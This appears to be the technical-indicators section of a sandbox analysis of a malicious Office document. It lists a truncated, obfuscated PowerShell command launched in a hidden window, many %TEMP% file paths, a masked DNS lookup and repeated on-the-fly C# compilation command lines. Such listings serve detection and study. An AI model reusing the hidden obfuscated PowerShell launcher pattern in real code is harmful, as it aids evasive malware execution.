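Technical Information
The entries below are a PowerShell command line started with -WindowStyle Hidden (shown truncated), two lists of file paths (almost all under %TEMP%), one DNS query, and two lists of process command lines. The page does not label what each list represents. The csc.exe and cvtres.exe command lines reference the same %TEMP% file names (*.cmdline, CSC*.tmp, RES*.tmp) that appear in the file lists.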
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function t94b1 {param($mca9daf)$k5a179='n143e1d';$g83e5fe='';for ($i=0; $i -lt $mca9daf.length;$i+=2){$hb7ecb=[convert]::ToByte($mca9daf.Substring($i,2),16);$g83e5fe+=[cha...
- %TEMP%\nue2rxgh.0.cs
- %TEMP%\m-whyu2o.cmdline
- %TEMP%\m-whyu2o.out
- %TEMP%\csc5e3f.tmp
- %TEMP%\res5e4f.tmp
- %TEMP%\m-whyu2o.dll
- %TEMP%\lh_322rd.0.cs
- %TEMP%\lh_322rd.cmdline
- %TEMP%\efl0oq_8.dll
- %TEMP%\m-whyu2o.0.cs
- %TEMP%\lh_322rd.out
- %TEMP%\lh_322rd.dll
- %TEMP%\3i_ptjdj.0.cs
- %TEMP%\3i_ptjdj.cmdline
- %TEMP%\3i_ptjdj.out
- %TEMP%\.ds_store
- %TEMP%\csc9358.tmp
- %TEMP%\res9369.tmp
- %TEMP%\csc7755.tmp
- %TEMP%\res7765.tmp
- %TEMP%\res4a2b.tmp
- %TEMP%\csc4a2a.tmp
- %TEMP%\efl0oq_8.out
- %TEMP%\nue2rxgh.out
- %TEMP%\cscd8e.tmp
- %TEMP%\resd9f.tmp
- %TEMP%\nue2rxgh.dll
- %TEMP%\k920autd.0.cs
- %TEMP%\k920autd.cmdline
- %TEMP%\k920autd.out
- %TEMP%\csc1aec.tmp
- %TEMP%\nue2rxgh.cmdline
- %TEMP%\res1aed.tmp
- %TEMP%\xt5cf0xg.0.cs
- %TEMP%\xt5cf0xg.cmdline
- %TEMP%\xt5cf0xg.out
- %TEMP%\csc3460.tmp
- %TEMP%\res3471.tmp
- %TEMP%\xt5cf0xg.dll
- %TEMP%\efl0oq_8.0.cs
- %TEMP%\efl0oq_8.cmdline
- %TEMP%\k920autd.dll
- %TEMP%\3i_ptjdj.dll
- <LS_APPDATA>\microsoft\windows\<INETFILES>\content.word\~wrf{04271510-53c3-4b78-bd59-d4bae84209bd}.tmp
- %TEMP%\resd9f.tmp
- %TEMP%\res5e4f.tmp
- %TEMP%\csc5e3f.tmp
- %TEMP%\m-whyu2o.pdb
- %TEMP%\m-whyu2o.cmdline
- %TEMP%\m-whyu2o.0.cs
- %TEMP%\m-whyu2o.out
- %TEMP%\m-whyu2o.dll
- %TEMP%\res7765.tmp
- %TEMP%\csc7755.tmp
- %TEMP%\k920autd.pdb
- %TEMP%\lh_322rd.pdb
- %TEMP%\lh_322rd.out
- %TEMP%\lh_322rd.cmdline
- %TEMP%\lh_322rd.0.cs
- %TEMP%\res9369.tmp
- %TEMP%\csc9358.tmp
- %TEMP%\3i_ptjdj.cmdline
- %TEMP%\3i_ptjdj.0.cs
- %TEMP%\3i_ptjdj.pdb
- %TEMP%\3i_ptjdj.out
- %TEMP%\efl0oq_8.dll
- %TEMP%\efl0oq_8.out
- %TEMP%\efl0oq_8.cmdline
- %TEMP%\efl0oq_8.pdb
- %TEMP%\efl0oq_8.0.cs
- %TEMP%\nue2rxgh.dll
- %TEMP%\nue2rxgh.0.cs
- %TEMP%\nue2rxgh.cmdline
- %TEMP%\nue2rxgh.out
- %TEMP%\nue2rxgh.pdb
- %TEMP%\res1aed.tmp
- %TEMP%\csc1aec.tmp
- %TEMP%\k920autd.0.cs
- %TEMP%\k920autd.dll
- %TEMP%\3i_ptjdj.dll
- %TEMP%\lh_322rd.dll
- %TEMP%\k920autd.out
- %TEMP%\res3471.tmp
- %TEMP%\csc3460.tmp
- %TEMP%\xt5cf0xg.cmdline
- %TEMP%\xt5cf0xg.0.cs
- %TEMP%\xt5cf0xg.out
- %TEMP%\xt5cf0xg.pdb
- %TEMP%\xt5cf0xg.dll
- %TEMP%\res4a2b.tmp
- %TEMP%\csc4a2a.tmp
- %TEMP%\cscd8e.tmp
- %TEMP%\k920autd.cmdline
- %TEMP%\.ds_store
- DNS ASK sa###itgs.com (part of the domain is masked with ### on this page, so this is not a complete domain name)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\nue2rxgh.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD9F.tmp" "%TEMP%\CSCD8E.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\k920autd.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1AED.tmp" "%TEMP%\CSC1AEC.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\xt5cf0xg.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES3471.tmp" "%TEMP%\CSC3460.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\efl0oq_8.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4A2B.tmp" "%TEMP%\CSC4A2A.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\m-whyu2o.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5E4F.tmp" "%TEMP%\CSC5E3F.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\lh_322rd.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7765.tmp" "%TEMP%\CSC7755.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\3i_ptjdj.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9369.tmp" "%TEMP%\CSC9358.tmp"' (with hidden window)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\nue2rxgh.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD9F.tmp" "%TEMP%\CSCD8E.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\k920autd.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1AED.tmp" "%TEMP%\CSC1AEC.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\xt5cf0xg.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES3471.tmp" "%TEMP%\CSC3460.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\efl0oq_8.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4A2B.tmp" "%TEMP%\CSC4A2A.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\m-whyu2o.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES5E4F.tmp" "%TEMP%\CSC5E3F.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\lh_322rd.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7765.tmp" "%TEMP%\CSC7755.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\3i_ptjdj.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9369.tmp" "%TEMP%\CSC9358.tmp"
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding